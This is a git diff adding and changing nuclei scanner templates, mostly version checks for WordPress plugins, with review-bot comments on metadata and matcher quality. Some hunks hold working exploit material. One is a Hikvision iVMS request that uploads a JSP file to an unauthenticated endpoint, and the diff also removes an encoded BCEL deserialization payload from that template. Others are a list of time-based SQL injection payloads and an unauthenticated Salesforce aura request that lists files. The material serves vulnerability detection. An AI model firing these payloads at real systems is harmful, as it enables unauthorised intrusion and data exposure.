type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "registrations-for-the-events-calendar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.12.2') \ No newline at end of file diff --git a/poc/other/the-post-grid-11c57e46d323949f1474677c8ea8f409.yaml b/poc/other/the-post-grid-11c57e46d323949f1474677c8ea8f409.yaml new file mode 100644 index 0000000000..5d70f1e3a0 --- /dev/null +++ b/poc/other/the-post-grid-11c57e46d323949f1474677c8ea8f409.yaml 
@@ -0,0 +1,59 @@ +id: the-post-grid-11c57e46d323949f1474677c8ea8f409 + +info: + name: > + The Post Grid <= 7.7.11 - Authenticated (Contributor+) Information Disclosure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dddecb2e-9ad6-4e44-afce-5eba7da6322d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/the-post-grid/" + google-query: inurl:"/wp-content/plugins/the-post-grid/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,the-post-grid,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/the-post-grid/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "the-post-grid" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.7.11') \ No newline at end of file diff --git a/poc/other/vikinghammer-tweet-250b3e7014946f4e8b446448451f1a15.yaml b/poc/other/vikinghammer-tweet-250b3e7014946f4e8b446448451f1a15.yaml new file mode 100644 index 0000000000..4e314facff --- /dev/null +++ b/poc/other/vikinghammer-tweet-250b3e7014946f4e8b446448451f1a15.yaml 
@@ -0,0 +1,59 @@ +id: vikinghammer-tweet-250b3e7014946f4e8b446448451f1a15 + +info: + name: > + Vikinghammer Tweet <= 0.2.4 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d0598341-0088-42bf-9a34-794c941a848d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/vikinghammer-tweet/" + google-query: inurl:"/wp-content/plugins/vikinghammer-tweet/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,vikinghammer-tweet,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/vikinghammer-tweet/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "vikinghammer-tweet" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.2.4') \ No newline at end of file diff --git a/poc/other/woo-producttables-pro-feb88140040e1c1f4c2ea5be5291d525.yaml b/poc/other/woo-producttables-pro-feb88140040e1c1f4c2ea5be5291d525.yaml new file mode 100644 index 0000000000..7785af80fe --- /dev/null +++ b/poc/other/woo-producttables-pro-feb88140040e1c1f4c2ea5be5291d525.yaml 
@@ -0,0 +1,59 @@ +id: woo-producttables-pro-feb88140040e1c1f4c2ea5be5291d525 + +info: + name: > + WBW Product Table Pro <= 1.9.4 - Unauthenticated Arbitrary SQL Execution + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac167257-c34e-45a2-8647-ed5cdb8dd64d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-producttables-pro/" + google-query: inurl:"/wp-content/plugins/woo-producttables-pro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-producttables-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-producttables-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-producttables-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9.4') \ No newline at end of file diff --git a/poc/other/zephyr-project-manager-ae04686326d43f919e9c393e1e364c95.yaml b/poc/other/zephyr-project-manager-ae04686326d43f919e9c393e1e364c95.yaml new file mode 100644 index 0000000000..9a6bd53c06 --- /dev/null +++ b/poc/other/zephyr-project-manager-ae04686326d43f919e9c393e1e364c95.yaml 
@@ -0,0 +1,59 @@ +id: zephyr-project-manager-ae04686326d43f919e9c393e1e364c95 + +info: + name: > + Zephyr Project Manager <= 3.3.102 - Missing Authorization to Authenticated (Subscriber+) Status Updates + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6746d20c-d528-4c69-95e4-9f22d6460463?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/zephyr-project-manager/" + google-query: inurl:"/wp-content/plugins/zephyr-project-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,zephyr-project-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zephyr-project-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.102') \ No newline at end of file diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml index 0ebd67934b..7e328a8b1b 100644 --- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml +++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml 
@@ -1,27 +1,50 @@ id: HIKVISION info: - name: HIKVISION - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: - fofa-query: app="HIKVISION-综合安防管理平台" - hunter-query: web.title="综合安防管理平台" + fofa-query: icon_hash="-911494769" + hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" +variables: + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + http: - raw: - | - POST /bic/ssoService/v1/applyCT HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - Testcmd: whoami - - {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + Content-Type: image/jpeg + + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- + + - | + GET /eps/upload/{{name}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: name + json: + - ".data.resourceUuid" + internal: true matchers: - type: 
word words:
- - "nt authority\\system"
+ - '{{randstr}}'
diff --git a/poc/remote_code_execution/salesforce-contentdocument-detector.yaml b/poc/remote_code_execution/salesforce-contentdocument-detector.yaml
new file mode 100644
index 0000000000..19c7c66a85
--- /dev/null
+++ b/poc/remote_code_execution/salesforce-contentdocument-detector.yaml
@@ -0,0 +1,37 @@
+id: salesforce-contentdocument-detector
+
+info:
+ name: Salesforce ContentDocument Detector
+ author: TedJackson
+ severity: Medium
+ description: A Salesforce Lightning aura API allows unathenticated users to fetch files.
+ tags: aura,unauth,salesforce,exposure,misconfig
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/s/"
+
+ extractors:
+ - type: regex
+ group: 1
+ name: auracontext
+ part: body
+ internal: true
+ regex:
+ - "\\/s\\/sfsites\\/l\\/([a-zA-Z0-9\\-_~.%]+)\\/[^\\/]+\\.js"
+
+ - raw:
+ - |
+ POST /s/sfsites/aura HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
+ Content-Type: application/x-www-form-urlencoded
+
+ message={"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"ContentDocument","layoutType":"FULL","pageSize":100,"currentPage":0,"useTimeout":false,"getCount":false,"enableRowActions":false}}]}&aura.context={{auracontext}}&aura.pageURI=%2Fs%2F&aura.token=null
+
+ matchers:
+ - type: word
+ words:
+ - '"state":"SUCCESS",'
+ part: body
diff --git a/poc/remote_code_execution/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml b/poc/remote_code_execution/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml
new file mode 100644
index 0000000000..5c4318cc5c
--- /dev/null
+++ b/poc/remote_code_execution/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml
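Review bot: The aura request asks for `"pageSize":100`, so every host this flags hands back metadata for up to 100 ContentDocument records even though the matcher only looks at `"state":"SUCCESS",`; a detector should request the minimum needed to prove the condition, `"pageSize":1`, and leave any fuller listing to a manual, authorised follow-up. The template also uses the older `requests:` section where every other template in this commit uses `http:`, writes `severity: Medium` where the rest of the commit uses lowercase values (`critical`, `medium`), and has a typo in the description (`unathenticated`). It is filed under poc/remote_code_execution/ while its own tags say `exposure,misconfig`; moving it to a directory matching the tags would keep the tree consistent.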
@@ -0,0 +1,59 @@ +id: ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5 + +info: + name: > + TI WooCommerce Wishlist <= 2.8.2 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6c8456fa-939c-4ceb-8361-a8758aec7708?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ti-woocommerce-wishlist/" + google-query: inurl:"/wp-content/plugins/ti-woocommerce-wishlist/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ti-woocommerce-wishlist,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ti-woocommerce-wishlist/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ti-woocommerce-wishlist" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.2') \ No newline at end of file diff --git a/poc/search/extended-search-plugin-7e067968dc74df931237c1c4dd7e5960.yaml b/poc/search/extended-search-plugin-7e067968dc74df931237c1c4dd7e5960.yaml new file mode 100644 index 0000000000..d603cfda59 --- /dev/null +++ b/poc/search/extended-search-plugin-7e067968dc74df931237c1c4dd7e5960.yaml 
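Review bot: The metadata block is left empty — `description: >` with no body, `cvss-metrics:`, `cvss-score:` and `cve-id:` blank, `shodan-query: 'vuln:'` with no identifier — yet the template carries the `cve` tag, so anything that filters on that tag or reads `cve-id` gets an entry with nothing behind it; either fill these from the linked Wordfence advisory or drop the `cve` tag and the empty keys. The same pattern repeats in the extended-search-plugin, relevanssi-live-ajax-search, front-end-only-users, popup-builder, special-feed-items, theme-editor and zephyr-project-manager hunks, and this ti-woocommerce-wishlist file is added a second time, byte-identical (same index 5c4318cc5c, same `id`), under poc/sql/, which a loader keyed by template id will likely report as a duplicate. These templates only compare the readme `Stable tag` against `<= 2.8.2`, so a hit means an in-range version string, not a confirmed injection, and the empty description should say so, e.g. `Version check only: matches the plugin's Stable tag; does not exercise the vulnerability.` Directory placement is also off: an XSS (zephyr-project-manager), a PHAR deserialization (theme-editor) and a CSRF (special-feed-items) sit under poc/sql/ while this SQL injection sits under poc/remote_code_execution/.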
@@ -0,0 +1,59 @@ +id: extended-search-plugin-7e067968dc74df931237c1c4dd7e5960 + +info: + name: > + Enhanced Search Box <= 0.6.1 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/13fb8d16-2904-4c04-9ea6-5bafdf30f563?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/extended-search-plugin/" + google-query: inurl:"/wp-content/plugins/extended-search-plugin/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,extended-search-plugin,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/extended-search-plugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "extended-search-plugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.6.1') \ No newline at end of file diff --git a/poc/search/relevanssi-live-ajax-search.yaml b/poc/search/relevanssi-live-ajax-search.yaml new file mode 100644 index 0000000000..2bf0c2e77c --- /dev/null +++ b/poc/search/relevanssi-live-ajax-search.yaml 
@@ -0,0 +1,59 @@ +id: relevanssi-live-ajax-search + +info: + name: > + Relevanssi Live Ajax Search <= 2.4 - Unauthenticated WP_Query Argument Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bbcb648a-4a3e-4645-bd62-4415b1cf6516?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/relevanssi-live-ajax-search/" + google-query: inurl:"/wp-content/plugins/relevanssi-live-ajax-search/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,relevanssi-live-ajax-search,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/relevanssi-live-ajax-search/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "relevanssi-live-ajax-search" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4') \ No newline at end of file diff --git a/poc/sql/BlindSQLAuth.yaml b/poc/sql/BlindSQLAuth.yaml index ce5d86554b..6fd8c3c79a 100644 --- a/poc/sql/BlindSQLAuth.yaml +++ b/poc/sql/BlindSQLAuth.yaml 
@@ -1,33 +1,33 @@
-id: time-based-sqli
-info:
- name: Time-Based Blind SQL Injection
- author: KhukuriRimal
- severity: Critical
- description: Detects time-based blind SQL injection vulnerability
-http:
- - method: GET
- path:
- - "{{BaseURL}}"
- payloads:
- injection:
- - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
- - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
- - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
- - "if(now()=sysdate(),SLEEP(7),0)"
- - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
- - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
- - "XOR(if(now()=sysdate(),sleep(7),0))XOR"
- - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337"
- fuzzing:
- - part: query
- type: replace
- mode: single
- fuzz:
- - "{{injection}}"
- stop-at-first-match: true
- matchers:
- - type: dsl
- dsl:
- - "status_code == 200"
- - "duration>=7 && duration <=16"
- condition: and
\ No newline at end of file
+id: time-based-sqli
+info:
+ name: Time-Based Blind SQL Injection
+ author: Coffinxp/lostsec
+ severity: Critical
+ description: Detects time-based blind SQL injection vulnerability
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ payloads:
+ injection:
+ - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
+ - "'%2b(select*from(select(sleep(7)))a)%2b'"
+ - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
+ - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z"
+ - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X"
+ - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
+ - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X"
+ - "if(now()=sysdate(),SLEEP(7),0)"
+ - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
+ - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{injection}}"
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "duration>=7 && duration <=16"
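Review bot: The rewritten matcher drops `- "status_code == 200"` and `condition: and`, so any response that takes 7–16 s now matches — a slow 5xx, a WAF tarpit or an overloaded host — with nothing tying the delay to the injected expression. Keep the status check alongside the timing check (`- "status_code == 200"`, `- "duration>=7 && duration <=16"`, `condition: and`), and since a fixed threshold has no baseline, the description should state that a hit must be confirmed against the latency of a non-injected request before it is reported. The new list also no longer contains a PostgreSQL-style entry, so coverage is now MySQL-style `SLEEP()` only, which the name and description do not say. This hunk is applied verbatim to poc/sql_injection/BlindSQLAuth.yaml further down, and poc/auth/BlindSQLAuth.yaml in the diffstat presumably 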